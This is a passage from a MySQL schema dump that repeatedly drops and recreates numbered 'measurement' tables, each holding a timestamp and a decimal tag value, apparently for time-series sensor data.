/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement172`
--
DROP TABLE IF EXISTS `measurement172`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement172` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement173`
--
DROP TABLE IF EXISTS `measurement173`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement173` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement174`
--
DROP TABLE IF EXISTS `measurement174`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement174` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement175`
--
DROP TABLE IF EXISTS `measurement175`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement175` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement176`
--
DROP TABLE IF EXISTS `measurement176`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement176` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement177`
--
DROP TABLE IF EXISTS `measurement177`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement177` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement178`
--
DROP TABLE IF EXISTS `measurement178`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement178` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement179`
--
DROP TABLE IF EXISTS `measurement179`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement179` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement18`
--
DROP TABLE IF EXISTS `measurement18`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement18` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement180`
--
DROP TABLE IF EXISTS `measurement180`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement180` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement181`
--
DROP TABLE IF EXISTS `measurement181`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement181` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement182`
--
DROP TABLE IF EXISTS `measurement182`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement182` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement183`
--
DROP TABLE IF EXISTS `measurement183`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement183` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement184`
--
DROP TABLE IF EXISTS `measurement184`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement184` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement185`
--
DROP TABLE IF EXISTS `measurement185`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement185` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement186`
--
DROP TABLE IF EXISTS `measurement186`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement186` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement187`
--
DROP TABLE IF EXISTS `measurement187`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement187` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement188`
--
DROP TABLE IF EXISTS `measurement188`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement188` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement189`
--
DROP TABLE IF EXISTS `measurement189`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement189` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement19`
--
DROP TABLE IF EXISTS `measurement19`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement19` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement190`
--
DROP TABLE IF EXISTS `measurement190`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement190` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement191`
--
DROP TABLE IF EXISTS `measurement191`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement191` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement192`
--
DROP TABLE IF EXISTS `measurement192`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement192` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement193`
--
DROP TABLE IF EXISTS `measurement193`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement193` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement194`
--
DROP TABLE IF EXISTS `measurement194`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement194` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement195`
--
DROP TABLE IF EXISTS `measurement195`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement195` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement196`
--
DROP TABLE IF EXISTS `measurement196`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement196` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement197`
--
DROP TABLE IF EXISTS `measurement197`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement197` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement198`
--
DROP TABLE IF EXISTS `measurement198`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement198` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement199`
--
DROP TABLE IF EXISTS `measurement199`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement199` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement2`
--
DROP TABLE IF EXISTS `measurement2`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement2` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement20`
--
DROP TABLE IF EXISTS `measurement20`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement20` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement200`
--
DROP TABLE IF EXISTS `measurement200`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement200` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement201`
--
DROP TABLE IF EXISTS `measurement201`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement201` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement202`
--
DROP TABLE IF EXISTS `measurement202`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement202` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement203`
--
DROP TABLE IF EXISTS `measurement203`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement203` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement204`
--
DROP TABLE IF EXISTS `measurement204`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement204` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement205`
--
DROP TABLE IF EXISTS `measurement205`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement205` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement206`
--
DROP TABLE IF EXISTS `measurement206`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement206` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement207`
--
DROP TABLE IF EXISTS `measurement207`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement207` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement208`
--
DROP TABLE IF EXISTS `measurement208`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement208` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement209`
--
DROP TABLE IF EXISTS `measurement209`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement209` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement21`
--
DROP TABLE IF EXISTS `measurement21`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement21` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement210`
--
DROP TABLE IF EXISTS `measurement210`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement210` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement211`
--
DROP TABLE IF EXISTS `measurement211`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement211` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement212`
--
DROP TABLE IF EXISTS `measurement212`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement212` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement213`
--
DROP TABLE IF EXISTS `measurement213`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement213` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement214`
--
DROP TABLE IF EXISTS `measurement214`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement214` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement215`
--
DROP TABLE IF EXISTS `measurement215`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement215` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement216`
--
DROP TABLE IF EXISTS `measurement216`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement216` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement217`
--
DROP TABLE IF EXISTS `measurement217`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement217` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement218`
--
DROP TABLE IF EXISTS `measurement218`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement218` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement219`
--
DROP TABLE IF EXISTS `measurement219`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement219` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement22`
--
DROP TABLE IF EXISTS `measurement22`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement22` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement220`
--
DROP TABLE IF EXISTS `measurement220`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement220` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement221`
--
DROP TABLE IF EXISTS `measurement221`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement221` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement222`
--
DROP TABLE IF EXISTS `measurement222`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement222` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement223`
--
DROP TABLE IF EXISTS `measurement223`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement223` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement224`
--
DROP TABLE IF EXISTS `measurement224`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement224` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement225`
--
DROP TABLE IF EXISTS `measurement225`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement225` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement226`
--
DROP TABLE IF EXISTS `measurement226`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement226` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement227`
--
DROP TABLE IF EXISTS `measurement227`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement227` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement228`
--
DROP TABLE IF EXISTS `measurement228`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement228` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement229`
--
DROP TABLE IF EXISTS `measurement229`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement229` (
